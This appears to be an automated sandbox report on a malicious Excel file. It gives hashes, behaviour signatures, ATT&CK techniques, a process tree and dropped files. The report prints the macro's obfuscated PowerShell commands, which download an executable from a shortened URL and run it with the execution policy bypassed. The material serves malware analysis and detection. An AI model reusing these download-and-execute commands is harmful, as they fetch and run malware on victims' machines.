076c11df218d9fd86a809bb3e3b4a9c2211caad31e630d731d64592bee49eec4

General

Target

DOCUMENTS.xls
Size

80KB
MD5

bfa6b801f26f67cc2231d4191a2486e5
SHA1

d6c3fe24036c6b402eeb80e065a11280aa236625
SHA256

076c11df218d9fd86a809bb3e3b4a9c2211caad31e630d731d64592bee49eec4
SHA512

b06a89f9606533c9c7c6c0884c76c7e59919e1b66425e7e7f97d11bb2faafea80ed379c056c440269f3c6b132c297ea90172f54f893600747609d67a1202367b

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/y6fpv3lj

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2656	1100	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3772	1100	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3356	1100	powershell.exe	EXCEL.EXE

Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

1100 EXCEL.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1100 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exeSLUI.exepowershell.exe

pid	process
3356	powershell.exe
2656	SLUI.exe
3772	powershell.exe
3356	powershell.exe
2656	SLUI.exe
3772	powershell.exe
2656	SLUI.exe
3356	powershell.exe
3772	powershell.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

1100 EXCEL.EXE
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

SLUI.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2656 SLUI.exe
Token: SeDebugPrivilege 3356 powershell.exe
Token: SeDebugPrivilege 3772 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

1100 EXCEL.EXE
1100 EXCEL.EXE

description	pid	process
Token: SeDebugPrivilege	2656	SLUI.exe
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE
1100	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

EXCEL.EXE

description	pid	process	target process
PID 1100 wrote to memory of 2656	1100	EXCEL.EXE	SLUI.exe
PID 1100 wrote to memory of 2656	1100	EXCEL.EXE	SLUI.exe
PID 1100 wrote to memory of 3772	1100	EXCEL.EXE	powershell.exe
PID 1100 wrote to memory of 3772	1100	EXCEL.EXE	powershell.exe
PID 1100 wrote to memory of 3356	1100	EXCEL.EXE	powershell.exe
PID 1100 wrote to memory of 3356	1100	EXCEL.EXE	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DOCUMENTS.xls"
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y6fpv3lj','ay.exe')
2⤵
- Process spawned unexpected child process
PID:2656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 20; Move-Item "ay.exe" -Destination "${enV`:temp}"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:temp};.('.'+'/ay.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c194a2621b19bf5380c6552b69c14e13

SHA1
8a865ac306da8a0488db53e72d17f03645a4ddfc

SHA256
f2be74ede0a9ed58f3ac5ca5b6a21121ae76b7d397f6094fa4c356609535758f

SHA512
34576c6fa3c058ba412c55c983ce75ebe11956c3279fa1b3cf9025672799314db8e75c3557c67919d19df6c34a66c0dfb67d1bb1d55cd103337ca26097d0111e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b2bf22c3df074e0904744da5abe3f6c7

SHA1
67939506f36f45c7ea14eafbab4a26ce5737db4a

SHA256
92bffa8733b1eefeca7c66d38bee39a4e6c2ed2f64cc3f2f8ff1b41f7169f212

SHA512
3e0d3249cba91c8e95fb8f9280cb13bbb1460155b0beb2e459003865c3298f51ee39161153dca03308940b3fc108b2d107ecf6906768a216c51172a849faded1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
c4ce67f816a401d7f1336ee6315c5b71

SHA1
e586a9461a9fbd8ddff8d1f55b6434a30498f84f

SHA256
ccb3a262c2d4b73414d62c8834cb5763a5b7080422eae58bab0cb28c34e74b93

SHA512
1c07b186c2f904195afa97264424926ac669177605e06317611f18d033c32dbecabef3357807ae3bb71d1495e44080d9300d0aea57cd7f0dbcf8e6d69807a8bc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
5387b7ee4b1739d551c541560746cbd8

SHA1
780ad0b62f89bf3f06206f5bc3dc29021bca8d4f

SHA256
dd2ad1b849e0847e578d57aa13e40b981f4b0c336e891ee0378f7ffb3903bc4d

SHA512
5c8b45adce8c549dc57977e974e48234ecaa0fae2c24501346f89dcc070a61d98f8cbd4b2d9e0539dee0dc5688a71c5f9d477703d9474efa7108f114d135ad67

Download Submit
C:\Users\Admin\Documents\ay.exe
MD5
bf21f24e83279b43e47279938f161adb

SHA1
9bb5836bf2823427904f72d82ff7766f1315f643

SHA256
053bca0fbabe4d0eff947ec5f517acc69bb100d4f89a5f7620a4186b15441fbd

SHA512
40912962c5eda1316908f4dea1874ddba394381d790e35cc234de3ed5e5b8a7ad006e5856e3b30ba3835ba00e566df3a0f04625558828dbd063ae20a6f9ea629

Download Submit
memory/1100-3-0x0000021658F30000-0x0000021658F31000-memory.dmp

Filesize
4KB

Download
memory/1100-2-0x00007FFE6DCC0000-0x00007FFE6E2F7000-memory.dmp

Filesize
6.2MB

Download
memory/2656-4-0x0000000000000000-mapping.dmp

Download
memory/2656-8-0x00007FFE63230000-0x00007FFE63C1C000-memory.dmp

Filesize
9.9MB

Download
memory/2656-12-0x000001DBD8460000-0x000001DBD8461000-memory.dmp

Filesize
4KB

Download
memory/2656-15-0x000001DBF0B80000-0x000001DBF0B81000-memory.dmp

Filesize
4KB

Download
memory/3356-9-0x00007FFE63230000-0x00007FFE63C1C000-memory.dmp

Filesize
9.9MB

Download
memory/3356-6-0x0000000000000000-mapping.dmp

Download
memory/3772-11-0x00007FFE63230000-0x00007FFE63C1C000-memory.dmp

Filesize
9.9MB

Download
memory/3772-5-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads